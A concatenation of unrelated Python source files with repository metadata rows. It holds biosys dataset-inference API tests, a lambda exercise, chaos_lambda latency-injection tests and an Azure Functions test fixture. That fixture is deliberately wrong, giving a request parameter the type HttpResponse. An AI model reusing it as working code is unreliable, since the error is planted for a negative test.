self.assertEqual(field.type, 'string')
self.assertFalse(field.required)
self.assertEqual(field.format, 'default')
field = schema.get_field_by_name('Age')
self.assertEqual(field.type, 'integer')
self.assertFalse(field.required)
self.assertEqual(field.format, 'default')
field = schema.get_field_by_name('Weight')
self.assertEqual(field.type, 'number')
self.assertFalse(field.required)
self.assertEqual(field.format, 'default')
field = schema.get_field_by_name('Comments')
self.assertEqual(field.type, 'string')
self.assertFalse(field.required)
self.assertEqual(field.format, 'default')
def test_generic_date_iso_xls(self):
"""
Scenario: date column with ISO string 'yyyy-mm-dd'
Given that a column is provided with strings of form 'yyyy-mm-dd'
Then the column type should be 'date'
And the format should be 'any'
"""
columns = ['What', 'When']
rows = [
columns,
['Something', '2018-01-19'],
['Another thing', dt.date(2017, 12, 29).isoformat()],
['Another thing', '2017-08-01']
]
client = self.data_engineer_1_client
file_ = helpers.rows_to_xlsx_file(rows)
with open(file_, 'rb') as fp:
payload = {
'file': fp,
}
resp = client.post(self.url, data=payload, format='multipart')
self.assertEqual(status.HTTP_200_OK, resp.status_code)
received = resp.json()
# data_package verification
self.assertIn('data_package', received)
self.verify_inferred_data(received)
# verify schema
schema_descriptor = Package(received.get('data_package')).resources[0].descriptor['schema']
schema = utils_data_package.GenericSchema(schema_descriptor)
field = schema.get_field_by_name('What')
self.assertEqual(field.type, 'string')
self.assertFalse(field.required)
self.assertEqual(field.format, 'default')
field = schema.get_field_by_name('When')
self.assertEqual(field.type, 'date')
self.assertFalse(field.required)
self.assertEqual(field.format, 'any')
def test_mix_types_infer_most_plausible(self):
"""
Scenario: column with more integers than string should be infer a type='integer'
Given than a column contains 2 strings then 5 integers
Then the column type should be 'integer'
"""
columns = ['How Many']
rows = [
columns,
[1],
['1 or 2'],
['3 or 4'],
[2],
[3],
[4],
[5]
]
client = self.data_engineer_1_client
file_ = helpers.rows_to_xlsx_file(rows)
with open(file_, 'rb') as fp:
payload = {
'file': fp,
}
resp = client.post(self.url, data=payload, format='multipart')
self.assertEqual(status.HTTP_200_OK, resp.status_code)
received = resp.json()
# data_package verification
self.assertIn('data_package', received)
self.verify_inferred_data(received)
# verify schema
schema_descriptor = Package(received.get('data_package')).resources[0].descriptor['schema']
schema = utils_data_package.GenericSchema(schema_descriptor)
field = schema.get_field_by_name('How Many')
self.assertEqual(field.type, 'integer')
def test_csv_with_excel_content_type(self):
"""
Often on Windows a csv file comes with an excel content-type (e.g: 'application/vnd.ms-excel')
Test that we handle the case.
"""
view = InferDatasetView.as_view()
columns = ['Name', 'Age', 'Weight', 'Comments']
rows = [
columns,
['Frederic', '56', '80.5', 'a comment'],
['Hilda', '24', '56', '']
]
file_ = helpers.rows_to_csv_file(rows)
factory = APIRequestFactory()
with open(file_, 'rb') as fp:
payload = {
'file': fp,
}
# In order to hack the Content-Type of the multipart form data we need to use the APIRequestFactory and work
# with the view directly. Can't use the classic API client.
# hack the content-type of the request.
data, content_type = factory._encode_data(payload, format='multipart')
if six.PY3:
data = data.decode('utf-8')
data = data.replace('Content-Type: text/csv', 'Content-Type: application/vnd.ms-excel')
if six.PY3:
data = data.encode('utf-8')
request = factory.generic('POST', self.url, data, content_type=content_type)
user = self.data_engineer_1_user
token, _ = Token.objects.get_or_create(user=user)
force_authenticate(request, user=self.data_engineer_1_user, token=token)
resp = view(request).render()
self.assertEqual(status.HTTP_200_OK, resp.status_code)
# should be json
self.assertEqual(resp.get('content-type'), 'application/json')
if six.PY3:
content = resp.content.decode('utf-8')
else:
content = resp.content
received = json.loads(content)
# name should be set with the file name
self.assertIn('name', received)
file_name = path.splitext(path.basename(fp.name))[0]
self.assertEqual(file_name, received.get('name'))
# type should be 'generic'
self.assertIn('type', received)
self.assertEqual('generic', received.get('type'))
# data_package verification
self.assertIn('data_package', received)
self.verify_inferred_data(received)
# verify schema
schema_descriptor = Package(received.get('data_package')).resources[0].descriptor['schema']
schema = utils_data_package.GenericSchema(schema_descriptor)
self.assertEqual(len(schema.fields), len(columns))
self.assertEqual(schema.field_names, columns)
field = schema.get_field_by_name('Name')
self.assertEqual(field.type, 'string')
self.assertFalse(field.required)
self.assertEqual(field.format, 'default')
field = schema.get_field_by_name('Age')
self.assertEqual(field.type, 'integer')
self.assertFalse(field.required)
self.assertEqual(field.format, 'default')
field = schema.get_field_by_name('Weight')
self.assertEqual(field.type, 'number')
self.assertFalse(field.required)
self.assertEqual(field.format, 'default')
field = schema.get_field_by_name('Comments')
self.assertEqual(field.type, 'string')
self.assertFalse(field.required)
self.assertEqual(field.format, 'default')
def test_infer_dataset_param(self):
"""
Test that when the param infer_dataset_type is set to False the type in generic even if we have a
valid observation type
"""
columns = ['What', 'Latitude', 'Longitude']
rows = [
columns,
['Observation1', -32.0, 117.75],
['Observation with lat/long as string', '-32.0', '115.75']
]
client = self.custodian_1_client
file_ = helpers.rows_to_xlsx_file(rows)
with open(file_, 'rb') as fp:
# no param: should infer the type
payload = {
'file': fp,
}
resp = client.post(self.url, data=payload, format='multipart')
self.assertEqual(status.HTTP_200_OK, resp.status_code)
received = resp.json()
self.assertEqual(Dataset.TYPE_OBSERVATION, received.get('type'))
# with param: return generic.
fp.seek(0)
payload = {
'file': fp,
'infer_dataset_type': False
}
resp = client.post(self.url, data=payload, format='multipart')
self.assertEqual(status.HTTP_200_OK, resp.status_code)
received = resp.json()
self.assertEqual(Dataset.TYPE_GENERIC, received.get('type'))
schema_descriptor = Package(received.get('data_package')).resources[0].descriptor['schema']
schema = utils_data_package.GenericSchema(schema_descriptor)
lat_field = schema.get_field_by_name('Latitude')
lon_field = schema.get_field_by_name('Longitude')
# no required constraints
self.assertFalse(lat_field.required)
self.assertFalse(lon_field.required)
class TestObservationSchema(InferTestBase):
def _more_setup(self):
self.url = reverse('api:infer-dataset')
def test_observation_with_lat_long_xls(self):
"""
Scenario: File with column Latitude and Longitude
Given that a column named Latitude and Longitude exists
Then they should be of type 'number'
And they should be set as required
And they should be tagged with the appropriate biosys tag
And the dataset type should be observation
"""
columns = ['What', 'Latitude', 'Longitude']
rows = [
columns,
['Observation1', -32, 117.75],
['Observation with lat/long as string', '-32', '115.75']
]
client = self.custodian_1_client
file_ = helpers.rows_to_xlsx_file(rows)
with open(file_, 'rb') as fp:
payload = {
'file': fp,
}
resp = client.post(self.url, data=payload, format='multipart')
self.assertEqual(status.HTTP_200_OK, resp.status_code)
received = resp.json()
# data_package verification
self.assertIn('data_package', received)
# verify fields attributes
schema_descriptor = Package(received.get('data_package')).resources[0].descriptor['schema']
schema = utils_data_package.GenericSchema(schema_descriptor)
lat_field = schema.get_field_by_name('Latitude')
lon_field = schema.get_field_by_name('Longitude')
self.assertEqual(lat_field.type, 'number')
self.assertEqual(lon_field.type, 'number')
self.assertTrue(lat_field.required)
self.assertTrue(lon_field.required)
# biosys types
self.assertTrue(BiosysSchema(lat_field.get(BiosysSchema.BIOSYS_KEY_NAME)).is_latitude())
self.assertTrue(BiosysSchema(lon_field.get(BiosysSchema.BIOSYS_KEY_NAME)).is_longitude())
self.assertEqual(Dataset.TYPE_OBSERVATION, received.get('type'))
# test biosys validity
self.verify_inferred_data(received)
def test_observation_with_lat_long_datum_xls(self):
"""
Scenario: File with column Latitude, Longitude and Datum
Given that columns named Latitude, Longitude and Datum exists
Then the dataset type should be inferred as Observation
And latitude should be of type 'number', set as required and tag with biosys type latitude
And longitude should be of type 'number', set as required and tag with biosys type longitude
And datum should be of type 'string', set as not required and with biosys type datum
"""
columns = ['What', 'Latitude', 'Longitude', 'Datum']
rows = [
columns,
['Observation1', -32, 117.75, 'WGS84'],
['Observation with lat/long as string', '-32', '115.75', None]
]
client = self.custodian_1_client
file_ = helpers.rows_to_xlsx_file(rows)
with open(file_, 'rb') as fp:
payload = {
'file': fp,
}
resp = client.post(self.url, data=payload, format='multipart')
self.assertEqual(status.HTTP_200_OK, resp.status_code)
received = resp.json()
# type observation
self.assertEqual(Dataset.TYPE_OBSERVATION, received.get('type'))
# verify fields attributes
schema_descriptor = Package(received.get('data_package')).resources[0].descriptor['schema']
schema = utils_data_package.GenericSchema(schema_descriptor)
lat_field = schema.get_field_by_name('Latitude')
self.assertEqual(lat_field.type, 'number')
self.assertTrue(lat_field.required)
biosys = lat_field.get('biosys')
biosys_type = biosys.get('type')
self.assertEqual(biosys_type, BiosysSchema.LATITUDE_TYPE_NAME)
lon_field = schema.get_field_by_name('Longitude')
self.assertEqual(lon_field.type, 'number')
self.assertTrue(lon_field.required)
biosys = lon_field.get('biosys')
biosys_type = biosys.get('type')
self.assertEqual(biosys_type, BiosysSchema.LONGITUDE_TYPE_NAME)
# datum
datum_field = schema.get_field_by_name('Datum')
self.assertEqual(datum_field.type, 'string')
self.assertFalse(datum_field.required)
biosys = datum_field.get('biosys')
biosys_type = biosys.get('type')
self.assertEqual(biosys_type, BiosysSchema.DATUM_TYPE_NAME)
# test that we can save the dataset back.
self.verify_inferred_data(received)
def test_observation_with_easting_northing_datum_xls(self):
"""
Scenario: File with column Easting, Northing and Datum
Given that a column named Easting , Northing and Datum exist
Then the dataset type should be inferred as Observation
And the type of Easting and Northing should be 'number'
And Easting and Northing should be set as required
And they should be tagged with the appropriate biosys tag
And Datum should be of type string and required.
"""
columns = ['What', 'Easting', 'Northing', 'Datum', 'Comments']
rows = [
columns,
['Something', 12563.233, 568932.345, 'WGS94', 'A dog'],
['Observation with easting/northing as string', '12563.233', '568932.345', 'WGS94', 'A dog']
]
client = self.custodian_1_client
file_ = helpers.rows_to_xlsx_file(rows)
with open(file_, 'rb') as fp:
payload = {
'file': fp,
}
resp = client.post(self.url, data=payload, format='multipart')
self.assertEqual(status.HTTP_200_OK, resp.status_code)
received = resp.json()
# should be an observation
self.assertEqual(Dataset.TYPE_OBSERVATION, received.get('type'))
# data_package verification
self.assertIn('data_package', received)
# verify fields attributes
schema_descriptor = Package(received.get('data_package')).resources[0].descriptor['schema']
schema = utils_data_package.GenericSchema(schema_descriptor)
east_field = schema.get_field_by_name('Easting')
self.assertIsNotNone(east_field)
self.assertEqual(east_field.type, 'number')
self.assertTrue(east_field.required)
biosys = east_field.get('biosys')
self.assertIsNotNone(biosys)
biosys_type = biosys.get('type')
self.assertEqual(biosys_type, BiosysSchema.EASTING_TYPE_NAME)
north_field = schema.get_field_by_name('Northing')
self.assertIsNotNone(north_field)
self.assertEqual(north_field.type, 'number')
self.assertTrue(north_field.required)
biosys = north_field.get('biosys')
self.assertIsNotNone(biosys)
biosys_type = biosys.get('type')
self.assertEqual(biosys_type, BiosysSchema.NORTHING_TYPE_NAME)
datum_field = schema.get_field_by_name('Datum')
self.assertIsNotNone(datum_field)
self.assertEqual(datum_field.type, 'string')
self.assertTrue(datum_field.required)
biosys = datum_field.get('biosys')
self.assertIsNotNone(biosys)
biosys_type = biosys.get('type')
self.assertEqual(biosys_type, BiosysSchema.DATUM_TYPE_NAME)
# test that we can save the dataset as returned
self.verify_inferred_data(received)
def test_observation_with_easting_northing_zone_xls(self):
"""
Scenario: File with column Easting, Northing and Zone
Given that a column named Easting , Northing and Zone exist
Then the dataset type should be inferred as Observation
And the type of Easting and Northing should be 'number'
And Easting and Northing should be set as required
And they should be tagged with the appropriate biosys tag
And Zone should be of type integer and required.
"""
columns = ['What', 'Easting', 'Northing', 'Zone', 'Comments']
rows = [
columns,
['Something', 12563.233, 568932.345, 50, 'A dog'],
['Observation with easting/northing as string', '12563.233', '568932.345', 50, 'A dog']
]
client = self.custodian_1_client
file_ = helpers.rows_to_xlsx_file(rows)
with open(file_, 'rb') as fp:
payload = {
'file': fp,
}
resp = client.post(self.url, data=payload, format='multipart')
self.assertEqual(status.HTTP_200_OK, resp.status_code)
received = resp.json()
# should be an observation
self.assertEqual(Dataset.TYPE_OBSERVATION, received.get('type'))
# data_package verification
self.assertIn('data_package', received)
# verify fields attributes
schema_descriptor = Package(received.get('data_package')).resources[0].descriptor['schema']
schema = utils_data_package.GenericSchema(schema_descriptor)
east_field = schema.get_field_by_name('Easting')
self.assertIsNotNone(east_field)
self.assertEqual(east_field.type, 'number')
self.assertTrue(east_field.required)
biosys = east_field.get('biosys')
self.assertIsNotNone(biosys)
biosys_type = biosys.get('type')
self.assertEqual(biosys_type, BiosysSchema.EASTING_TYPE_NAME)
north_field = schema.get_field_by_name('Northing')
self.assertIsNotNone(north_field)
self.assertEqual(north_field.type, 'number')
self.assertTrue(north_field.required)
biosys = north_field.get('biosys')
self.assertIsNotNone(biosys)
biosys_type = biosys.get('type')
self.assertEqual(biosys_type, BiosysSchema.NORTHING_TYPE_NAME)
zone_field = schema.get_field_by_name('Zone')
self.assertIsNotNone(zone_field)
self.assertEqual(zone_field.type, 'integer')
self.assertTrue(zone_field.required)
biosys = zone_field.get('biosys')
self.assertIsNotNone(biosys)
biosys_type = biosys.get('type')
self.assertEqual(biosys_type, BiosysSchema.ZONE_TYPE_NAME)
# test that we can save the dataset as returned
self.verify_inferred_data(received)
class TestSpeciesObservation(InferTestBase):
def _more_setup(self):
self.url = reverse('api:infer-dataset')
def test_observation_with_species_name_only_xls(self):
"""
Scenario: File with column Latitude and Longitude and Species Name should be inferred as species observation
Given that a column named Latitude and Longitude and Species Name exists
Then the dataset type should be of type speciesObservation
And the column 'Species Name' should be of type string
And the column 'Species Name' should be set as 'required'
And they should be tagged with the speciesName biosys tag.
"""
columns = ['What', 'When', 'Latitude', 'Longitude', 'Species Name', 'Comments']
rows = [
columns,
['I saw a dog', '2018-02-02', -32, 117.75, 'Canis lupus', None],
['I saw a Chubby bat', '2017-01-02', -32, 116.7, 'Chubby bat', 'Amazing!'],
['I saw nothing', '2018-01-02', -32.34, 116.7, None, None],
]
client = self.custodian_1_client
file_ = helpers.rows_to_xlsx_file(rows)
with open(file_, 'rb') as fp:
payload = {
'file': fp,
}
resp = client.post(self.url, data=payload, format='multipart')
self.assertEqual(status.HTTP_200_OK, resp.status_code)
received = resp.json()
# should be a species observation
self.assertEqual(Dataset.TYPE_SPECIES_OBSERVATION, received.get('type'))
self.assertIn('data_package', received)
schema_descriptor = Package(received.get('data_package')).resources[0].descriptor['schema']
schema = utils_data_package.GenericSchema(schema_descriptor)
species_name_field = schema.get_field_by_name('Species Name')
# field attributes
self.assertIsNotNone(species_name_field)
self.assertEqual(species_name_field.type, 'string')
self.assertTrue(species_name_field.required)
# biosys type
biosys = species_name_field.get('biosys')
self.assertIsNotNone(biosys)
biosys_type = biosys.get('type')
self.assertEqual(biosys_type, BiosysSchema.SPECIES_NAME_TYPE_NAME)
# test that we can create a dataset with the returned data
self.verify_inferred_data(received)
def test_observation_with_genus_and_species_only_xls(self):
"""
Scenario: File with column Latitude, Longitude, Genus and Species should be inferred as species observation
Given that a column named Latitude, Longitude, Genus and Species exists
Then the dataset type should be of type speciesObservation
And the column 'Genus' should be of type string, set as required and tag as biosys type genus
And the column 'Species' should be of type string, set as required and tag as biosys type species
"""
columns = ['What', 'When', 'Latitude', 'Longitude', 'Genus', 'Species', 'Comments']
rows = [
columns,
['I saw a dog', '2018-02-02', -32, 117.75, 'Canis', 'lupus', None],
['I saw a Chubby bat', '2017-01-02', -32, 116.7, 'Chubby', 'bat', 'Amazing!'],
['I saw nothing', '2018-01-02', -32.34, 116.7, None, None, None],
]
client = self.custodian_1_client
file_ = helpers.rows_to_xlsx_file(rows)
with open(file_, 'rb') as fp:
payload = {
'file': fp,
}
resp = client.post(self.url, data=payload, format='multipart')
self.assertEqual(status.HTTP_200_OK, resp.status_code)
received = resp.json()
# should be a species observation
self.assertEqual(Dataset.TYPE_SPECIES_OBSERVATION, received.get('type'))
self.assertIn('data_package', received)
schema_descriptor = Package(received.get('data_package')).resources[0].descriptor['schema']
schema = utils_data_package.GenericSchema(schema_descriptor)
# field attributes
# genus
genus = schema.get_field_by_name('Genus')
self.assertIsNotNone(genus)
self.assertEqual(genus.type, 'string')
self.assertTrue(genus.required)
biosys = genus.get('biosys')
self.assertIsNotNone(biosys)
biosys_type = biosys.get('type')
self.assertEqual(biosys_type, BiosysSchema.GENUS_TYPE_NAME)
species = schema.get_field_by_name('Species')
self.assertIsNotNone(species)
self.assertEqual(species.type, 'string')
self.assertTrue(species.required)
biosys = species.get('biosys')
self.assertIsNotNone(biosys)
biosys_type = biosys.get('type')
self.assertEqual(biosys_type, BiosysSchema.SPECIES_TYPE_NAME)
# test that we can create a dataset with the returned data
self.verify_inferred_data(received)
def test_observation_with_genus_species_infra_rank_and_infra_name_only_xls(self):
"""
Scenario: File with column Latitude, Longitude, Genus, Species, Infraspecific Rank and Infraspecific Name
should be inferred as species observation
Given that a column named Latitude, Longitude, Genus, Species Infraspecific Rank and Infraspecific Name exists
Then the dataset type should be of type speciesObservation
And the column 'Genus' should be of type string, set as required and tag as biosys type genus
And the column 'Species' should be of type string, set as required and tag as biosys type species
And the column 'Infraspecific Rank' should be of type string, set as not required and tag as biosys type InfraSpecificRank
And the column 'Infraspecific Name' should be of type string, set as not required and tag as biosys type InfraSpecificName
"""
columns = ['What', 'When', 'Latitude', 'Longitude', 'Genus', 'Species', 'Infraspecific Rank',
'Infraspecific Name', 'Comments']
rows = [
columns,
['I saw a dog', '2018-02-02', -32, 117.75, 'Canis', 'lupus', 'subsp. familiaris', '', None],
['I saw a Chubby bat', '2017-01-02', -32, 116.7, 'Chubby', 'bat', '', '', 'Amazing!'],
['I saw nothing', '2018-01-02', -32.34, 116.7, None, None, None, None, None],
]
client = self.custodian_1_client
file_ = helpers.rows_to_xlsx_file(rows)
with open(file_, 'rb') as fp:
payload = {
'file': fp,
}
resp = client.post(self.url, data=payload, format='multipart')
self.assertEqual(status.HTTP_200_OK, resp.status_code)
received = resp.json()
# should be a species observation
self.assertEqual(Dataset.TYPE_SPECIES_OBSERVATION, received.get('type'))
self.assertIn('data_package', received)
schema_descriptor = Package(received.get('data_package')).resources[0].descriptor['schema']
schema = utils_data_package.GenericSchema(schema_descriptor)
# field attributes
# genus
genus = schema.get_field_by_name('Genus')
self.assertIsNotNone(genus)
self.assertEqual(genus.type, 'string')
self.assertTrue(genus.required)
biosys = genus.get('biosys')
self.assertIsNotNone(biosys)
biosys_type = biosys.get('type')
self.assertEqual(biosys_type, BiosysSchema.GENUS_TYPE_NAME)
# species
species = schema.get_field_by_name('Species')
self.assertIsNotNone(species)
self.assertEqual(species.type, 'string')
self.assertTrue(species.required)
biosys = species.get('biosys')
self.assertIsNotNone(biosys)
biosys_type = biosys.get('type')
self.assertEqual(biosys_type, BiosysSchema.SPECIES_TYPE_NAME)
# infra rank
infra_rank = schema.get_field_by_name('Infraspecific Rank')
self.assertIsNotNone(infra_rank)
self.assertEqual(infra_rank.type, 'string')
self.assertFalse(infra_rank.required)
biosys = infra_rank.get('biosys')
self.assertIsNotNone(biosys)
biosys_type = biosys.get('type')
self.assertEqual(biosys_type, BiosysSchema.INFRA_SPECIFIC_RANK_TYPE_NAME)
# infra name
infra_name = schema.get_field_by_name('Infraspecific Name')
self.assertIsNotNone(infra_name)
self.assertEqual(infra_name.type, 'string')
self.assertFalse(infra_name.required)
biosys = infra_name.get('biosys')
self.assertIsNotNone(biosys)
biosys_type = biosys.get('type')
self.assertEqual(biosys_type, BiosysSchema.INFRA_SPECIFIC_NAME_TYPE_NAME)
# test that we can create a dataset with the returned data
self.verify_inferred_data(received)
| 44.763224 | 131 | 0.610686 | 3,993 | 35,542 | 5.271225 | 0.075131 | 0.071978 | 0.02328 | 0.026606 | 0.816372 | 0.79485 | 0.771095 | 0.749572 | 0.712847 | 0.683438 | 0 | 0.016165 | 0.288138 | 35,542 | 793 | 132 | 44.819672 | 0.815739 | 0.165438 | 0 | 0.68984 | 0 | 0 | 0.103054 | 0.000833 | 0 | 0 | 0 | 0 | 0.327986 | 1 | 0.032086 | false | 0 | 0.026738 | 0 | 0.065954 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0ac8c36f6e8b9e52b5bb988abdadbb1aea3a0a96 | 140 | py | Python | Data Scientist Career Path/5. Data Manipulation with Pandas/1. Python Lambda Function/4. double or zero.py | myarist/Codecademy | 2ba0f104bc67ab6ef0f8fb869aa12aa02f5f1efb | [
"MIT"
] | 23 | 2021-06-06T15:35:55.000Z | 2022-03-21T06:53:42.000Z | Data Scientist Career Path/5. Data Manipulation with Pandas/1. Python Lambda Function/4. double or zero.py | shivaniverma1/Data-Scientist | f82939a411484311171465591455880c8e354750 | [
"MIT"
] | null | null | null | Data Scientist Career Path/5. Data Manipulation with Pandas/1. Python Lambda Function/4. double or zero.py | shivaniverma1/Data-Scientist | f82939a411484311171465591455880c8e354750 | [
"MIT"
] | 9 | 2021-06-08T01:32:04.000Z | 2022-03-18T15:38:09.000Z | #Write your lambda function here
double_or_zero = lambda num: num * 2 if num > 10 else 0
print(double_or_zero(15))
print(double_or_zero(5)) | 28 | 55 | 0.764286 | 27 | 140 | 3.740741 | 0.62963 | 0.237624 | 0.356436 | 0.336634 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.058333 | 0.142857 | 140 | 5 | 56 | 28 | 0.783333 | 0.221429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.666667 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
7c15638be80d927ab67a1b4aef2c874b667d134c | 120 | py | Python | popmon/version.py | sbrugman-ing/popmon | a2ede6b7d56772404e9921545b83886e1a9b3806 | [
"MIT"
] | null | null | null | popmon/version.py | sbrugman-ing/popmon | a2ede6b7d56772404e9921545b83886e1a9b3806 | [
"MIT"
] | null | null | null | popmon/version.py | sbrugman-ing/popmon | a2ede6b7d56772404e9921545b83886e1a9b3806 | [
"MIT"
] | null | null | null | """THIS FILE IS AUTO-GENERATED BY SETUP.PY."""
name = "popmon"
version = "0.3.8"
full_version = "0.3.8"
release = True
| 17.142857 | 46 | 0.65 | 21 | 120 | 3.666667 | 0.809524 | 0.207792 | 0.233766 | 0.25974 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.059406 | 0.158333 | 120 | 6 | 47 | 20 | 0.70297 | 0.333333 | 0 | 0 | 1 | 0 | 0.216216 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7c5cfed5b79c43e29cdf264d93a36a6deb2aaf67 | 127 | py | Python | tests/unittests/broken_functions/invalid_in_anno/main.py | yojagad/azure-functions-python-worker | d5a1587a4ccf56af64f211a64f0b7a3d6cf976c9 | [
"MIT"
] | 1 | 2018-11-28T22:31:27.000Z | 2018-11-28T22:31:27.000Z | tests/unittests/broken_functions/invalid_in_anno/main.py | yojagad/azure-functions-python-worker | d5a1587a4ccf56af64f211a64f0b7a3d6cf976c9 | [
"MIT"
] | null | null | null | tests/unittests/broken_functions/invalid_in_anno/main.py | yojagad/azure-functions-python-worker | d5a1587a4ccf56af64f211a64f0b7a3d6cf976c9 | [
"MIT"
] | 1 | 2018-04-22T18:03:52.000Z | 2018-04-22T18:03:52.000Z | import azure.functions as azf
def main(req: azf.HttpResponse): # should be azf.HttpRequest
return 'trust me, it is OK!'
| 21.166667 | 61 | 0.716535 | 20 | 127 | 4.55 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.188976 | 127 | 5 | 62 | 25.4 | 0.883495 | 0.19685 | 0 | 0 | 0 | 0 | 0.19 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
7c9120b70f1c809d76ec44f20faa5c83949fea3b | 77 | py | Python | farmer/ncc/callbacks/__init__.py | tamahassam/farmer | 512c6fcd5dc5aa223a0fad02527d8000a4cc9ab4 | [
"Apache-2.0"
] | 10 | 2019-04-04T07:32:47.000Z | 2021-01-07T00:40:50.000Z | farmer/ncc/callbacks/__init__.py | tamahassam/farmer | 512c6fcd5dc5aa223a0fad02527d8000a4cc9ab4 | [
"Apache-2.0"
] | 59 | 2019-04-18T05:44:31.000Z | 2021-05-02T10:33:02.000Z | farmer/ncc/callbacks/__init__.py | tamahassam/farmer | 512c6fcd5dc5aa223a0fad02527d8000a4cc9ab4 | [
"Apache-2.0"
] | 4 | 2020-01-23T14:01:43.000Z | 2021-02-11T04:16:14.000Z | from .keras_callbacks import *
from .keras_prune import KerasPruningCallback
| 25.666667 | 45 | 0.857143 | 9 | 77 | 7.111111 | 0.666667 | 0.28125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103896 | 77 | 2 | 46 | 38.5 | 0.927536 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
7cb2d47d70fd778410377b005cdfdddfe2b3c597 | 5,524 | py | Python | tests/test_delay.py | adhorn/aws-lambda-failure-injection | a6d10af49ea823dc0d24998fe6d5f5544327fc03 | [
"MIT"
] | 74 | 2019-07-17T09:55:09.000Z | 2022-02-04T02:27:59.000Z | tests/test_delay.py | adhorn/aws-lambda-chaos-injection | 294956d50199eee6b42524b75915e6f5b1da93ca | [
"MIT"
] | 16 | 2019-07-17T07:10:51.000Z | 2021-09-28T07:52:38.000Z | tests/test_delay.py | adhorn/aws-lambda-failure-injection | a6d10af49ea823dc0d24998fe6d5f5544327fc03 | [
"MIT"
] | 9 | 2019-08-20T01:47:55.000Z | 2022-01-30T17:33:48.000Z | from chaos_lambda import inject_fault
from . import TestBase, ignore_warnings
import unittest
import logging
import pytest
import sys
@inject_fault
def handler(event, context):
return {
'statusCode': 200,
'body': 'Hello from Lambda!'
}
class TestDelayMethods(TestBase):
@pytest.fixture(autouse=True)
def inject_fixtures(self, caplog):
self._caplog = caplog
@ignore_warnings
def _setTestUp(self, subfolder):
class_name = self.__class__.__name__
self._setUp(class_name, subfolder)
config = "{ \"delay\": 400, \"is_enabled\": true, \"error_code\": 404, \"exception_msg\": \"This is chaos\", \"rate\": 1, \"fault_type\": \"latency\"}"
self._create_params(name='test.config', value=config)
@ignore_warnings
def test_get_delay(self):
method_name = sys._getframe().f_code.co_name
self._setTestUp(method_name)
with self._caplog.at_level(logging.DEBUG, logger="chaos_lambda"):
response = handler('foo', 'bar')
assert (
'Injecting 400 ms of delay with a rate of 1' in self._caplog.text
)
assert (
'sleeping now' in self._caplog.text
)
self.assertEqual(
str(response), "{'statusCode': 200, 'body': 'Hello from Lambda!'}")
class TestDelayMethodsnotEnabled(TestBase):
@pytest.fixture(autouse=True)
def inject_fixtures(self, caplog):
self._caplog = caplog
@ignore_warnings
def _setTestUp(self, subfolder):
class_name = self.__class__.__name__
self._setUp(class_name, subfolder)
config = "{ \"delay\": 400, \"is_enabled\": false, \"error_code\": 404, \"exception_msg\": \"This is chaos\", \"rate\": 1, \"fault_type\": \"latency\"}"
self._create_params(name='test.config', value=config)
@ignore_warnings
def test_delay_not_enabled(self):
method_name = sys._getframe().f_code.co_name
self._setTestUp(method_name)
with self._caplog.at_level(logging.DEBUG, logger="chaos_lambda"):
response = handler('foo', 'bar')
assert (
len(self._caplog.text) == 0
)
assert (
'sleeping now' not in self._caplog.text
)
self.assertEqual(
str(response), "{'statusCode': 200, 'body': 'Hello from Lambda!'}")
class TestDelayMethodslowrate(TestBase):
@pytest.fixture(autouse=True)
def inject_fixtures(self, caplog):
self._caplog = caplog
@ignore_warnings
def _setTestUp(self, subfolder):
class_name = self.__class__.__name__
self._setUp(class_name, subfolder)
config = "{ \"delay\": 400, \"is_enabled\": true, \"error_code\": 404, \"exception_msg\": \"This is chaos\", \"rate\": 0.000001, \"fault_type\": \"latency\"}"
self._create_params(name='test.config', value=config)
@ignore_warnings
def test_delay_low_rate(self):
method_name = sys._getframe().f_code.co_name
self._setTestUp(method_name)
with self._caplog.at_level(logging.DEBUG, logger="chaos_lambda"):
response = handler('foo', 'bar')
assert (
'sleeping now' not in self._caplog.text
)
self.assertEqual(
str(response), "{'statusCode': 200, 'body': 'Hello from Lambda!'}")
class TestDelayEnabledNoDelay(TestBase):
@pytest.fixture(autouse=True)
def inject_fixtures(self, caplog):
self._caplog = caplog
@ignore_warnings
def _setTestUp(self, subfolder):
class_name = self.__class__.__name__
